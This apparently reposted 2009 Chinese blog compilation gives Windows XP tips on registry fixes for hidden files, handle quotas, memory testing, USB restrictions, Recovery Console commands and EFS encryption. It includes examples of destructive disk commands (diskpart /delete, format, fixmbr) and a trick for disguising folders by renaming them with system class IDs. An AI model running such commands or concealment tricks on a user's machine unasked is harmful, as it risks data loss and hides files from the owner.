玩转电脑技巧的全书

玩转电脑技巧的全书 【实用收藏】玩转电脑技巧全书[申请精 华] 2009-02-08 20:37:51 被3167人转藏 | 小贴士:不得不说的话题:女性身体探秘! 1.关于“显示隐藏文件”的知识集合 2.Windows系统内存的问题集 3.关于对U盘的补充总总 4.WindowsXP修复控制台详解 5.让普通文件夹挤进控制面板 6.系统安全之NTFS格式下加密与解密问题 7.Windows加载项错误集合 8.重新注册DLL 修复Windows操作系统故障 9.关于删除“删不掉”的文件的补充 10.有备而来 让Windows寻找文件不再迷茫 11.Windows:我不在 你自动关机 12.让XP系统的时间显示充满个性 13.防范非法用户入侵Win 2K/XP系统七招 14.避开杀毒软件建立让它查不到的文件夹 15.Windows目录安全性提升 16.判断Windows是否被流氓侵入 17.Windows操作系统使用记录自动清除技巧 18.查出Windows XP中未“签名文件”的来源 18.WinXP空间:文件的属性也玩“花样” 19.三类危险的TXT文件 20.Win XP系统的超级管理员Administrator.. 21.XP操作系统启动的详细过程 22.更改Windows默认的软件安装路径 23.走出误区戳穿XP的经典谣言 24.Win XP远程桌面实现双管理员同时登录 25.Windows系统桌面图标八大故障解决方法 26.让Windows XP自动维护系统 27.内置于Windows XP的防火墙ICF的应用 28.在Windows XP中查看计算机开关机记录 29.两种修改网卡物理地址的方法 30.不放光盘让Windows系统自动修复受损文件 31.细说Windows XP虚拟内存优化 32.Windows中管理文件的方法 33.解析来自Autorun.inf文件的攻击 34.将系统中的“病毒”Thumbs.db一网打尽 35.打造万能Windows封装包 36.定制你想要的Windows XP系统还原 37.让Windows系统更快更稳定的九大技巧 38.提高效率:屏蔽Win XP中不需用到的功能 39.系统自动启动程序之十大藏身之所 40.Win XP系统任务管理器使用技巧 41.不能完成下载的原因及解决办法 42.Boot文件讲解 43.将收藏夹内网站按字母排序 44.通过注册表优化Win XP 之ADSL 45.修改MTU值加快网页打开速度 46.命令行下配置Windows XP防火墙 47.防御Telnet被黑客利用方法 48.误删除SAM文件的恢复 49.WindowsXP应用技巧及经验总结 50.Windows操作系统六大用户组及系统帐户权限功能设置.. 51.Windows登录类型的分类 52.卸载屏保的方法 53.如何删除系统顽固文件 54.Windows XP自动关机的实现 55.Rundll32.exe命令使用大法 56.去除Windows XP/2000/98系统启动画面 57.WinXP系统文件关联解析 58.Windows快捷键 59.Windows XP运行命令 60.Windows系统文件解析 61.Windows常用文件扩展名解析 关于“显示隐藏文件”的知识集合 2009-02-08 15:55:05 被128人转藏 | 小贴士:专家支招,让你的口袋疯狂起来 关于“显示隐藏文件”的知识集合 老实说之所以选择再整理老帖上来是吾等最不情愿的事情。无奈新人要求多脾气大，吾等不屑抹杀之。如果每个新人都如SXX一样不思进取的话，我宁愿选择让知识发臭也不愿去教导害群之马～ A、在Windows XP中显示隐藏文件的方法 1、打开任意一个Windows Explorer窗口(比如“我的电脑”或“我的文档”); 2、单击菜单栏中的“工具”，选择“文件夹选项”; 3、在弹出的窗口中选择“查看”标签页; 4、在“高级设置”目录中选中“显示所有文件和文件夹”，再点击“确定”即可; 某些受保护的系统文件即使不是被隐藏的文件也可能不被显示。解决的办法是在以上步骤4中取消“隐藏受保护的操作系统文件”钩选。 B、常见症状 选择“工具--文件夹选项--查看--显示所有文件”。保存后还是看不到隐藏文件，再打开查看时又变成“不显示隐藏文件”了。因为病毒会导致上述的修改无效。 C、解决对策 一、组策略法 运行命令“gpedit.msc”打开“组策略”对话框，依次打开“用户配置”〉“管理模板”〉Windows资源管理器，在右边的选项中选中“从‘工具’菜单删除‘文件夹选项’菜单”，双击后切换到“设置”标签页，你会发现“已启用”，所以你看不到文件夹选项。将其设置为“已禁用”或“未配置”确定即可。 二、注册表法 修改注册表 “运行--regedit”进入注册表，定位到: HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer \Advanced\Folder\Hidden\SHOWALL中的CheckedValue，检查它的类型是否为 REG_DWORD，如果不是则删掉CheckedValue，然后单击右键“新建”--〉“Dword 值”，并命名为CheckedValue，然后修改它的键值为1 。在这里大家要注意 “CheckedValue”的键值是十进制的还是十六进制的，只有十六进制下的值才有 效(有某些狡猾的病毒会在这方面做文章) 另:1)如果仍然无法正常显示，请先尝试将nohidden键下二进制键值 CheckedValue和DefaultValue的值都设为2;showall键下将CheckedValue值 设为1，DefaultValue值设为2。 CheckedValue对应修改其值为1，类型为十六进制 DefaultValue对应修改其值为2，类型为十六进制 Text对应修改其值为@shell32.dll,-30500。 2)如果还是无法显示，应该是百年一遇的 HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer \Advanced\Folder\Hidden的数据丢失或损坏。遇到这种情况，请在Windows XP 安装光盘中找到Hidden.reg，双击它，然后单击“确定”按钮，将该完整的注 册表数据添加到当前系统的注册表中即可。(备注:如果各位手头上没有XP安 装光盘又不幸遇到这种情况，可以尝试使用这种方法:找一部没有问题的电脑， 把 HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer \Advanced\Folder\Hidden这个分支导出(假如命名为1.reg);然后备份有问 题的电脑的该注册表分支;最后把1.reg导入看能否解决问题。 PS、显示“隐藏受保护的操作系统文件”的方法: HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer \Advanced\Folder\Hidden，把右侧窗口的键值Type修改为“checkbox” 三、脚本法 打开“记事本”，把下面的内容复制入记事本内。然后另存为 .reg文件 Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explore r\Advanced\Folder\Hidden\SHOWALL] "RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Ad vanced" "Text"="@shell32.dll,-30500" "Type"="radio" "CheckedValue"=dword:00000001 保存文件名:"显示被隐藏的文件.reg"，(确保在“文件夹选项”中去掉“隐藏已知文件类型的扩展名”)，双击运行此文件，再重新到“文件夹选项”中设置显示隐藏文件。 ?博弈圣 ? Windows系统内存的问题集 2009-02-08 15:54:25 被91人转藏 | 小贴士:哇!别人的口袋访问量好高啊，怎么办到的? A、彻底解决Windows系统内存不足的问题 如今，内存越来越便宜，许多朋友为自己的PC配备了高容量的内存，以期得到理想的系统性能，1G、2G甚至更多内存的PC已经很常见了。但是，出乎许多朋友意料的是，即使Windows系统，不仅仅Windows Vista也包括Windows 2000/XP/2003，具有2GB甚至更多的内存，有时也会遇到Windows Vista提示“内存不足”警告的情况，或者虽无提示但程序窗口无法打开，或程序窗口虽然打开但却不完整如缺少菜单、按钮等，而事实上，这时仍有相当部分的物理内存闲置，颇令许多朋友困扰，难道为Windows配备这么大的内存便是一种浪费么, 在当Windows Vista提示“内存不足”，我们介绍过出现这种情况多是因为默认的Desktop Heap区间被占满所致，并给出将desktop heap区大小从默认的3072KB提高到需要数值的办法。不过，许多战友依步骤进行调整后发现，仍然没有从根本上解决这一问题，上述的故障仍然时不时地再次出现，那么，问题出在哪儿, 其实，在Windows NT 家族系统中，除了desktop heap区的限制外，默认的用户句柄(User Handle)与GDI 句柄(GDI Handle)限制同样是引发上述故障的原因之一，特别是考虑到之前系统物理内存普遍较少的客观情况，默认的用户句柄与GDI 句柄数量也成为Windows 阻止同时打开更多程序/窗口的另一个主要原因。 解决很简单，那便是将默认的用户句柄与GDI 句柄数量修改为较大的数值。 提高Windows默认的默认的用户句柄与GDI句柄数量 在Windows Vista开始菜单的搜索框中输入“regedit”，回车; 注册表编辑将会触发UAC而弹出提示窗口，点击确认继续; 按当Windows Vista提示“内存不足”介绍的方法，首先将desktop heap区的大小从默认的3072KB提高，检查问题是否解决。如没有解决，再尝试以下的步骤—— 找到如下注册表分支: HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows NT\CurrentVersion\Windows 在右侧窗格中可以看到名为“GDIProcessHandleQuota”与“USERProcessHandleQuota”的注册表项; GDIProcessHandleQuota项设置GDI句柄数量，默认值为2710(16进制)/10000(10进制)，该值的允许范围为 256 ~ 16384 ，将其调整为大于默认的10000的值。如果您的系统配置了2G或更多内容，不妨将其设置为允许的最大值 16384(10进制); USERProcessHandleQuota项设置用户句柄数量，默认值同样为2710(16进制)/10000(10进制)，该值的允许范围为 200 ~ 18000 ，将其调整为更多的数值。同样地，对于具有2GB或更多物理内存的系统，不妨将用户句柄数直接设置为上限 18000(10进制); 需要强调的是，修改“GDIProcessHandleQuota”与“USERProcessHandleQuota”值时，不要超过其接受的上限，不然，将导致 Windows 无法工作或运行不稳定。另一方面，即使您的调整其超过其允许的上限，如果发现修改后Windows出现不稳定的症状，便需要将相应的数值调低些，或者恢复默认值。 注:本技巧适用于Windows 2000、 Windows XP、 Windows Server 2003、Windows Vista; 修改注册表存在风险，请谨慎操作，最好在修改前备份注册表，以当系统故障时恢复。 B、怎样判断内存兼容性 内存出现兼容性问题在电脑故障中所占的比率是比较高的，有的严重一些，直接蓝屏无法启动;有的比较隐蔽一些，用了一段时间才会发现。而且大多数内存兼容性问题比较隐蔽，再加上Windows操作系统本身也并不稳定，还是会出现死机等现象;所以会影响大部分DIYer对故障原因的判断。那么如何去判断隐蔽性的内存兼容性问题呢, 一、内存出现兼容性问题的故障现象 内存出现兼容问题给DIYer留下最深的印象恐怕就是蓝屏和死机。其实，由内存引起的故障远远不止这一些，下面在下稍微地总结一下。 症状1、直接无法启机，并有报警声。 症状2、直接蓝屏，出现内存读写错误的提示。 症状3、安装操作系统过程中蓝屏，并出现内存读写错误的提示。 症状4、安装操作系统过程提示某些文件不可复制，但敲击enter后又可以继续进行，反复出现，就和光驱或者光盘出现问题的症状一样。 症状5、操作系统使用过程中，蓝屏死机。 症状6、电脑无故重启，而且不是很规律;但有可能只有当你运行某些程序的时候出现的概率才大一些。 上面这些现象，内存出现兼容性问题后都会出现。但并不代表出现这些现象就一定是内存出现了兼容性问题，但也可以作为初期的一个考虑方法。 二、判断内存出现兼容性问题 如何判断内存出现兼容性问题呢,通常用软件进行测试是最有效的说明。以前我常用memtest、memtest86+、StressPrime 2004(简称SP2004)这三个软件，通过三四个小时的测试后，可以认为系统不存在内存兼容性问题了。 1、Memtest MemTest是少见的内存检测工具，它不但可以彻底的检测出内存的稳定度，还可同时测试记忆的储存与检索资料的能力，让你可以确实掌控到目前你机器上正在使用的内存到底可不可信赖。这款软件最新的版本是3.7，有汉化版()，可以在Window下直接运行(不用安装，绿色软件)，而且有免费的版本可以使用，唯一的不方便就是在使用伊始会出现提示对话框。 使用方法: Step1:运行memtest软件。然后会出现一个提示框，单击“确定”。 Step2:点击“Start Testing”，剩下的工作就完全交给这个软件了，一般至少需要测试到200%。 总结:这个软件非常小巧，便于拷贝，而且测试过程很苛刻;建议装机前用此款软件跑上几圈。另外，在使用这款软件的时候，最好将无关的程序关掉，因为这款软件只能测试剩余(就是没有参与系统工作的)的内存;而且如果你有超过1G的内存，需要同时运行两个memtest，因为免费的版本不支持1G以上的内存测试。同样这个软件也有一些bug，比较著名的就是软件对温度敏感，当PC温度过高时，也容易出现错误;另外，还比较容易作弊，所以网络中的memtest 测试结果不要轻易相信。 2、Memtest86+ Memtest86+从Memtest86发展而来，这两个软件功能等各方面都非常相似，但Memtest86+的更新速度较快。使用这两个软件检测内存，需要制作启动盘用于启动电脑，然后再进线内存检测。可以在其官方网站()中下载到三个版本:光盘启动版、软盘启动版、USB闪存启动版。其中后两种制作对于初学者来说有些麻烦，这里笔者建议大家采用光盘启动版。这个软件同样很小巧，目前最新的版本是1.70版。虽然制作过程有点繁琐，但测试更为严格。推荐那些对系统要求苛刻而且喜欢超频的用户的使用。 使用方法: Step1:下载光盘启动版后，用刻录机刻录镜像文件。 Step2:制作启动盘之后用其启动电脑，软件将显示当前系统的CPU型号、频率、缓存，以及系统物理内存容量与速度。并开始自动检测内存，而且是无限循环的测试，一直到手动停止测试为止。默认设置之下软件将使用标准测试方式，通常测试一次需时约1小时，完全测试方式则需要好几个小时，因而，建议在需要检测之时，选择在晚上关机或其他准备长时间不使用电脑的时候，给软件充分的时间进行测试，力求检测结果更准确。如果需要使用完全测试方式，可以按下键盘上的“C”键，然后通过设置菜单选择“All Test”完全测试模式。 3、StressPrime 2004 Stress Prime 2004(SP2004)是一位国外电脑高手Johnny Lee做的测试计算机CPU稳定性的软件。软件基于Prime95(版本:23.8.1)制作而成，测试的理论、效果和Prime95一样，但操作界面比Prime95方便且人性化。另外可以配合MBM5使用，可以在测试中直接通过SP2000的调取CPU和北桥芯片的温度。 这个软件也十分小巧，最新版本为0.40，汉化版地址 ()，使用简单。可选择三种模式:少量FFTs、适当大量FFTs、混合。第一种模式着重测试CPU的稳定性，第二种模式着重测试内存的稳定性，第三种模式着重测试CPU和内存的稳定性。在运行程序的时候，一般采用第一种模式时可继续在系统上同时运行其它程序，比如浏览网页、观看视频、游戏等;而采用其他的模式最好不要再运行其他的软件。最后说明一点，本程序需要手动停止，除非软件出错(即系统通不过测试) 。 使用方法: Step1:这个软件是绿色的，下载完成后，解压缩，直接运行“SP2004”。 Step2: 在测试中选择“混合(着重CPU和内存)”，然后单击“开始”，一般 需要测试3个小时以上。 一般通过这三个软件的测试后，整套配置不会存在内存兼容性问题了。这三个软件有个共同的特点就是都需要手动停止(可无限的进行测试)，如果自行停止了说明软件出错，也就说存在兼容性隐患。其实，这种测试的模式不但可以检测系统稳定性，也可以作为超频成功与否的根据。相对而言，Memtest86+对内存的测试更为准确一些或者更为偏向;其他的两款软件可以作为辅助使用。最后需要注意两点: 1、如果内存的总容量超过1G，在使用Memtest测试的时候，需要开启两个程序，而且在测试过程中最好不要运行其他的软件。 2、对于双核的测试，如果需要SP2004的话，最好开启两个程序。否则对机器的测试，目前来看不是最苛刻的。一般情况下选择最苛刻的模式可以减少测试的时间。 C、彻底解决Windows系统读写错误 计算机系统中运行一些容量较大的程序或者游戏时，系统常常会自动弹出“xx内存不能为read或written”的错误提示，遇到这种故障信息时，我们该如何才能将它有效排除，同时确保下次运行容量较大的程序或者游戏时，系统不会再次出现系统内存读写错误呢?事实上，当我们不幸遭遇上面的故障信息时，我们可以尝试按照如下步骤进行依次排查。 移除无效插件程序 在上网冲浪的过程中，许多插件程序会偷偷地安装到计算机系统中，而不少插件程序往往都有防删除的功能，因此这些插件很容易与其他的应用程序发生冲突，从而间接地引起系统内存读写错误的现象。为了给那些大容量的应用程序或游戏提供一个干净、稳定的工作环境，我们最好定期使用安全防护软件，来查看系统是否被偷偷安装了各种无效的垃圾插件程序，一旦发现的话，那可以直接将它们从系统中及时卸载干净。 手工修复系统服务 与系统内存读写操作有关的Windows Management Instrumentation服务要是发生错误的话，也会导致系统弹出内存读写错误的提示，所以当我们遇到这种错误现象时，可以尝试手工修复一下Windows Management Instrumentation服务，下面就是具体的修复步骤: 首先，用鼠标右键单击系统桌面中的“我的电脑”图标，从弹出的快捷菜单中执行“管理”命令，打开本地系统的计算机管理窗口，在该窗口的左侧显示区域，依次展开“服务和应用程序”/“服务”选项，在对应“服务”选项所在的右侧显示区域中，找到Windows Management Instrumentation服务，并用鼠标 右键单击该服务选项，从弹出的快捷菜单中执行“属性”命令，打开服务属性设置界面; 其次在该设置界面的“常规”标签页面中，单击“停止”按钮，将Windows Management Instrumentation服务暂时停止运行。之后，打开计算机系统的资源管理器窗口，在该窗口中依次展开“Windows”、“system32”、“wbem”、 “repository”文件夹，然后将“repository”文件夹窗口中的所有文件进行一 下备份，备份完成后将该文件夹中的所有内容全部清除掉; 接下来，重新启动一下计算机系统，待系统启动成功后，按前面操作打开Windows Management Instrumentation服务的属性设置界面，单击该界面中的“启动”按钮，相信这么一来Windows Management Instrumentation服务就能正常运行了。 修复系统损坏文件 如果计算机系统不小心感染了病毒或者发生了误删除操作，那么与系统内存读写操作有关的系统文件很可能受到损坏，而这些系统文件一旦受到损坏的话，那么我们就很容易遭遇内存读写故障提示了。所以，我们一旦碰到内存读写错误的提示时，不妨按照如下步骤修复一下系统，看看系统是否存在损坏的文件: 首先使用最新版本的杀毒软件，来对计算机系统进行彻底地病毒查杀操作，因为计算机系统一旦感染了病毒而不进行清除的话，我们即使修复了系统文件，病毒仍然有可能会继续破坏系统文件，所以及时使用杀毒软件来将计算机中的病毒全部清除干净，可以确保系统文件不会继续受到病毒的威胁。 其次使用系统自带的“sfc”命令，来尝试将受到损坏的系统文件修复到正常状态。在修复受损系统文件时，只要在运行中输入“CMD”，打开“命令提示符”窗口，在其中输入字符串命令“sfc/scannow”，单击回车键后，该命令程序就会对系统每个角落处的系统文件进行搜索扫描，一旦发现系统文件的版本不正确或者系统文件已经损坏的话，它就能自动弹出提示界面，要求我们插入Windows系统的安装光盘，以便从中提取正常的系统文件来替代不正常的系统文件，从而达到修复系统文件的目的。要是系统修复操作成功的话，相信我们重新启动计算机系统时，就不会看到有什么不正常的现象了。 及时释放系统内存 我们知道，在运行一些容量较大的程序或者游戏时，需要消耗相当的系统内存资源，要是此时内存空间不够时，那么系统内存读写错误的故障提示很有可能就会发生。为了有效避免这种错误提示，我们最好在运行容量较大的程序或者游戏之前，应该先将计算机系统重新启动一下，这样能够将系统内存空间充分释放出来;如果计算机内存空间本身就比较小的话，那么我们建议各位最好及时升级内存，以便拓展内存的有效使用空间，以防止由于系统内存不足而造成系统内存读写错误的发生。 当然，在系统自身内存空间不足的情况下，我们应该先将那些随机启动的杀毒软件以及相关即时监控的程序暂时关闭掉，之后再尝试运行容量较大的应用程序或者网络游戏，因为杀毒软件及相关监控程序会在一定程度上消耗一些系统内存资源，将它们关闭可以节省不小的内存空间，从而能够有效避免内存读写错误现象的发生。当然，值得注意的是，我们在运行完大容量的程序或游戏之后，还 必须记得及时将相关程序的监控功能全部打开。 关于对U盘的补充总总 2009-02-08 15:53:30 被58人转藏 | 小贴士:网络潮人的流行用语，你懂多少, 关于对U盘的补充总总 禁止对U盘写入 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Controll 在Control项中新建一个“StorageDevicePolicies”的子项，再在该子项下新建一个“WriteProtect”的DWORD值，改其值为十六进制的 “1” 解除限制U盘正常使用 “运行”——“gpedit.msc”——“组策略/用户配置/管理模板/Windows组件/Windows资源管理器”——“阻止从‘我的电脑’访问驱动器”下，选择“已启用”标签下的“不限制任何驱动器” 禁用U盘 将HKEY_LOCAL_MACHINE\System\CurrentCotrolSet\Services\USBSTOR键值的右窗格“Start DWORD”值改为16进制的4 禁止U盘的驱动 系统盘:/Windows/inf目录下的Usbstor.inf和Usbstor.pnf驱动文件删除，然后在“属性--安全--组或成员名称”中选中要禁止的用户组，把“完全控制”选项改为拒绝。 隐藏盘符+禁止查看 在 HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ Explorer键值中，新建二进制值NoDrives，缺省值为 00 00 00 00表示不隐藏任何驱动器。该键值由四字节组成，每字节的一位(bit)对应从A:到Z:的盘符，当对应的值为1时表示隐藏。其中第一个字节代表从A到H的8个盘，即01为A，02为B。。。。;第二个字节代表I到P，第三个字节代表Q到X，第四个字节代表Y和Z。比如我们要关闭C盘，即为04 00 00 00 ;关闭D盘，即为08 00 00 00 ;如果要C盘D盘同时关闭则为 0C 00 00 00(C为十六进值，转为十进值为12)。实例:我的电脑有一个软驱，一个硬盘(5个分区) 和一个光驱，则磁盘有A:--H(光盘)，修改为No Drivers--02 ff ff ff，即隐藏了B盘、I到Z盘。 重启后在我的电脑里无法看见U盘，但是其实还是可以通过地址栏访问的。好， 斩草要除根，我们再新建一个二进值NoViewOnDrive，值设为02 ff ff ff。WindowsXP修复控制台详解 2009-02-08 15:52:39 被47人转藏 | 小贴士:测试:你最真实的一面(很准哦) WindowsXP修复控制台详解 Windows XP(包括 Windows 2000)的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。(当然大家可以在系统启动后按F8，插入XP系统光盘进入)这次整理了一下，希望对大家有所帮助: Bootcfg Bootcfg 命令启动配置和故障恢复(对于大多数计算机，即 boot.ini 文件)。 含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。 用法: bootcfg /default 设置默认引导项。 bootcfg /add 向引导列表中添加 Windows 安装。 bootcfg /rebuild 重复全部 Windows 安装过程并允许用户选择要添加的内容。 注意:使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份 boot.ini 文件。 bootcfg /scan 扫描用于 Windows 安装的所有磁盘并显示结果。 注意:这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。 bootcfg /list 列出引导列表中已有的条目。 bootcfg /disableredirect 在启动引导程序中禁用重定向。 bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings] 在启动引导程序中通过指定配置启用重定向。 范例: bootcfg /redirect com1 115200 bootcfg /redirect useBiosSettings Chkdsk 创建并显示磁盘的状态。Chkdsk 命令还可列出并纠正磁盘上的错误。 含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。 vol [drive:] [ chkdsk [drive:] [/p] [/r] 参数 无 如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。 drive: 指定要 chkdsk 检查的驱动器。 /p 即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱动器做任何更改。 /r 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。 注意 Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录(默认为 \%systemroot%\System32)中找到该文件，将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。 Diskpart 创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。 diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size] 参数 无 如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。 /add 创建新的分区。 /delete 删除现有分区。 Device_name 要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称: \Device\HardDisk0 Drive_name 以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例: D: partition_name 以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同 时使用。以下是分区名称的范例: \Device\HardDisk0\Partition1 大小 要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。 范例 下例将删除分区: diskpart /delete \ Device\ HardDisk0\ Partition3 diskpart /delete F: 下例将在硬盘上添加一个 20 MB 的分区: diskpart /add \ Device\ HardDisk0 20 Fixboot 向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时，才能使用 fixboot 命令。 fixboot [drive] 参数 驱动器 将要写入引导扇区的驱动器。它将替代默认的驱动器(即用户登录的系统分区)。例如，驱动器:D: 范例 下列命令范例向驱动器 D: 的系统分区写入新的分区引导扇区: fixboot d: 注意: 如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。 Fixmbr 修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可 用。 fixmbr [ device_name] 参数 device_name 要写入新的主引导记录的设备(驱动器)。设备名称可从 map 命令的输出获得。例如，设备名称: \Device\HardDisk0 范例 下列命令示例向指定设备写入一个新的主引导记录: fixmbr \Device\HardDisk0 注意:如果不指定 device_name，新的主引导记录将被写入引导设备，即装载主系统的驱动器。 如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。 Format 将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。 format [ drive:] [ /fs:file-system] 参数 drive: 指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。 /q 对驱动器进行快速格式化。不扫描驱动器看是否有坏区域，因此只应对以前格式化过的驱动器使用该参数。 /fs:file-system 指定要使用的文件系统:FAT、FAT32 或 NTFS 。如果未指定文件系统，将使用现有的文件系统格式。 Map 显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。 Map 命令仅在使用故障恢复控制台时才可用。 Map [ arc] 参数 arc 指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例: multi(0)disk(0)rdisk(0)partition(1) 等价的设备名称是: \Device\HardDisk0\Partition1 范例 下例将物理设备名映射为使用 ARC 设备名称的驱动器号: map arc 注意:如果不使用 arc 参数，则 map 命令显示设备名称。map 命令还显示文件系统的类型和每个磁盘的大小(MB) 让普通文件夹挤进控制面板 2009-02-08 15:51:57 被40人转藏 | 小贴士:测试:你最真实的一面(很准哦) 让普通文件夹挤进控制面板 在Windows中，打开控制面板，可以进行系统设置;打开拨号网络，可以建立新 连接，或进行拨号;打开打印机，可以安装打印机，并可对打印机进行设置„„。 其实，我们也可以自己制造这样的文件夹。下面就跟我一起来制作吧。 比如要把文件夹“aa”制成控制面板，方法如下:右键单击该文件夹，选择 “重命名”，输入“aa.{21EC2020-3AEA-1069-A2DD-08002B30309D}”(注意“aa”后有一个英文字符“.”)，回车。怎么样?变成了名称为“aa”的控制面 板了吧。再双击打开看看，弹出的也是控制面板的内容吧。那么这长串的数字是 什么意思呢?它是控制面板的类ID号。 用同样的方法，我们可以把任意一个文件夹变为其他的系统文件夹，方法是 只要在文件夹的名称后加上一个英文字符“.”和相应的类ID号即可。那么这些 系统文件夹的类ID号是多少呢? 控制面板:{21EC2020-3AEA-1069-A2DD-08002B30309D} 拨号网络:{992CFFA0-F557-101A-88EC-00DD010CCC48} 我的电脑:{20D04FE0-3AEA-1069-A2D8-08002B30309D} 网上邻居:{208D2C60-3AEA-1069-A2D7-08002B30309D} 打印机:{2227A280-3AEA-1069-A2DE-08002B30309D} 回收站:{645FF040-5081-101B-9F08-00AA002F984E} 计划任务:{D6277990-4C6A-11CF-8D87-00AA0060F5BF} 我的文档:{450D8FBA-AD25-11D0-98A8-0800361B1103} URL历史:{FF393560-C2A7-11CF-BFF4-444553540000} 字体:{BD84B380-8CA2-1069-AB1D-08000948F534} 其中，把文件夹设为控制面板、拨号网络、打印机、计划任务等时，双击打 开的是相应的内容，而设为其他文件夹时，双击打开的是这个文件夹的内容。所 以我们可以用设为控制面板、拨号网络、打印机、计划任务等的方法为重要文件 夹加密。 其实，一些文件夹加密软件对文件夹的加密原理也是相类似的。 对于加密后的文件夹怎么打开呢?因为我们无法把该文件夹名称中的类ID号直接删除，所以无法通过重命名把该文件夹变为普通文件夹。那么怎么办呢?我们可以用压缩软件WinRAR来解决这个问题。启动WinRAR，切换到该文件夹的上级文件夹，右键单击该文件夹，在弹出菜单中选择“重命名”，去掉类ID号即可变为普通文件夹了;也可直接进入该文件夹进行操作。 系统安全之NTFS格式下加密与解密问题 2009-02-08 15:51:21 被37人转藏 | 小贴士:我很喜欢这个口袋，我能订阅它么? 系统安全之NTFS格式下加密与解密问题 NTFS是WinNT以上版本支持的一种提供安全性、可靠性的高级文件系统。在Windows2000和WindowsXP中，NTFS还可以提供诸如文件和文件夹权限、加密、磁盘配额和压缩这样的高级功能。 一、加密文件或文件夹 步骤一:打开Windows资源管理器。 步骤二:右键单击要加密的文件或文件夹，然后单击“属性”。 步骤三:在“常规”选项卡上，单击“高级”。选中“加密内容以便保护数据”复选框 在加密过程中还要注意以下五点: 1.要打开“Windows 资源管理器”，请单击“开始?程序?附件”，然后单击“Windows 资源管理器”。 2.只可以加密NTFS分区卷上的文件和文件夹，FAT分区卷上的文件和文件夹无效。 3.被压缩的文件或文件夹也可以加密。如果要加密一个压缩文件或文件夹，则该文件或文件夹将会被解压。 4.无法加密标记为“系统”属性的文件，并且位于systemroot目录结构中的文件也无法加密。 5.在加密文件夹时，系统将询问是否要同时加密它的子文件夹。如果选择是，那它的子文件夹也会被加密，以后所有添加进文件夹中的文件和子文件夹都将在添加时自动加密。 二、解密文件或文件夹 步骤一:打开Windows资源管理器。 步骤二:右键单击加密文件或文件夹，然后单击“属性”。 步骤三:在“常规”选项卡上，单击“高级”。 步骤四:清除“加密内容以便保护数据”复选框。 同样，我们在使用解密过程中要注意以下问题: 1.要打开“Windows资源管理器”， 请单击“开始?程序?附件”，然后单击“Windows资源管理器”。 2.在对文件夹解密时，系统将询问是否要同时将文件夹内的所有文件和子文件夹解密。如果选择仅解密文件夹，则在要解密文件夹中的加密文件和子文件夹仍保持加密。但是，在已解密文件夹内创立的新文件和文件夹将不会被自动加密。 以上就是使用文件加、解密的方法!而在使用过程中我们也许会遇到以下一些问题，在此作以下说明: 1.高级按钮不能用 原因:加密文件系统(EFS)只能处理NTFS文件系统卷上的文件和文件夹。如果试图加密的文件或文件夹在FAT或FAT32卷上，则高级按钮不会出现在该文件或文件夹的属性中。 解决方案: 将卷转换成带转换实用程序的NTFS卷。 打开命令提示符。键入: Convert [drive]/fs:ntfs (drive 是目标驱动器的驱动器号) 2.当打开加密文件时，显示“拒绝访问”消息 原因:加密文件系统(EFS)使用公钥证书对文件加密，与该证书相关的私钥 在本计算机上不可用。 解决方案: 查找合适的证书的私钥，并使用证书管理单元将私钥导入计算机并在本机上使用。 3.用户基于NTFS对文件加密，重装系统后加密文件无法被访问的问题的解决方案(注意:重装Win2000/XP前一定要备份加密用户的证书): 步骤一:以加密用户登录计算机。 步骤二:单击“开始?运行”，键入“mmc”，然后单击“确定”。 步骤三:在“控制台”菜单上，单击“添加/删除管理单元”，然后单击“添加”。 步骤四:在“单独管理单元”下，单击“证书”，然后单击“添加”。 步骤五:单击“我的用户账户”，然后单击“完成”(如图2，如果你加密用户不是管理员就不会出现这个窗口，直接到下一步) 。 步骤六:单击“关闭”，然后单击“确定”。 步骤七:双击“证书??当前用户”，双击“个人”，然后双击“证书”。 